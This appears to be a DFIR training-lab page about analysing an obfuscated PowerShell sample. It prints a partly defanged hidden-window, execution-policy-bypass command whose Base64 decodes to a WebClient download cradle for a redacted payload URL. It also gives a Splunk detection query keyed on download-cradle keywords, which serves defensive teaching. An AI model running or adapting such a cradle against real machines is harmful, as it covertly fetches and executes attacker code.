Home/ Labs/ Suspicious PowerShell Analysis
Advanced DFIR Malware PowerShell

Suspicious PowerShell Analysis

โฑ 90โ€“120 minutes
๐ŸŽฏ Advanced
๐Ÿ“ฅ VirtualBox OVA
๐Ÿ”ง FLARE VM, CyberChef, Splunk

A heavily obfuscated PowerShell script was found running on an endpoint. Decode it, understand the attack chain, extract IOCs, and build detections that would catch it next time.

๐Ÿงช Lab Description

This advanced DFIR lab gives you a real obfuscated PowerShell sample (safely defanged) recovered from a compromised endpoint. You'll use static and dynamic analysis techniques to decode the payload, map the attack to MITRE ATT&CK, extract network IOCs, and create both Splunk detection rules and YARA signatures.

The sample uses multiple layers of obfuscation including Base64 encoding, string concatenation, and reflection โ€” techniques commonly used by commodity malware and APT actors.

๐ŸŽฏ Learning Objectives

  • Identify PowerShell obfuscation techniques (Base64, concatenation, reflection)
  • Use CyberChef to decode multi-layer obfuscated scripts
  • Perform safe dynamic analysis using FLARE VM sandbox
  • Extract network IOCs: C2 domains, IP addresses, user-agents
  • Map PowerShell TTPs to MITRE ATT&CK (T1059.001, T1027, T1105)
  • Write a Splunk PowerShell detection rule (Script Block Logging)
  • Create a basic YARA rule for the decoded payload

๐Ÿ“‹ Prerequisites

  • Completion of RDP Brute Force Detection lab
  • Basic PowerShell knowledge (not required but helpful)
  • Familiarity with Base64 encoding concepts
  • VirtualBox with 16GB RAM available (FLARE VM is resource-heavy)
  • Understanding of MITRE ATT&CK framework

๐Ÿ“ The Sample (Defanged)

The following is the obfuscated PowerShell command recovered from endpoint memory:

# DO NOT RUN - Defanged sample for analysis only pOwErSHeLl.EXE -NoP -NonI -W Hidden -Exec Bypass -Enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIA QwBsAGkAZQBuAHQAOwAkAHMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIA aQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBbAFIARQBEAEEAQwBUAEUA RABdAC8AcABhAHkAbABvAGEAZAAnACkA...

Your first task: decode this and identify what it's doing before running any further analysis.

โš  Walkthrough โ€” Spoiler Alert

โ–ผ Expand
โš  This is an advanced lab. Spend at least 30 minutes on your own before reading this.

Step 1 โ€” Initial Triage: The command-line flags are already telling: -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass. This is a classic malware invocation pattern (MITRE T1059.001).

Step 2 โ€” Decode Base64: Extract the -Enc value and decode in CyberChef using "From Base64" then "Decode text" (UTF-16LE). You'll get a WebClient download cradle.

Step 3 โ€” Extract IOCs: The decoded script downloads a second stage from a C2 URL. Extract: domain, URI path, User-Agent string. Submit domain to VirusTotal (in the lab you get a pre-canned VT report).

Step 4 โ€” Splunk Detection Rule:

index=wineventlog EventCode=4104 | search ScriptBlockText="*-enc*" OR ScriptBlockText="*WebClient*" OR ScriptBlockText="*DownloadString*" | stats count by ComputerName, UserID, ScriptBlockText | where count > 1

Step 5 โ€” MITRE Mapping: T1059.001 (PowerShell), T1027 (Obfuscated Files), T1105 (Ingress Tool Transfer), T1071.001 (Web Protocols for C2).

๐Ÿ“ฅ Download Lab

FLARE VM (Windows 10) + Splunk + CyberChef + defanged samples.

Size: ~5.8 GB
Format: OVA (VirtualBox 6.1+)
RAM: 8GB minimum
โฌ‡ Download OVA

SHA256 checksum included

๐Ÿ”ง Tools Required

โ–ธ VirtualBox 6.1+
โ–ธ FLARE VM (pre-installed)
โ–ธ CyberChef (pre-installed)
โ–ธ Splunk Free (pre-installed)
โ–ธ 8โ€“16 GB RAM

๐Ÿ“š References

MITRE T1059.001 โ†’ MITRE T1027 โ†’ CyberChef Online โ†’

๐Ÿ”— Related Labs

โ— SOC Alert Triage โ— RDP Brute Force Detection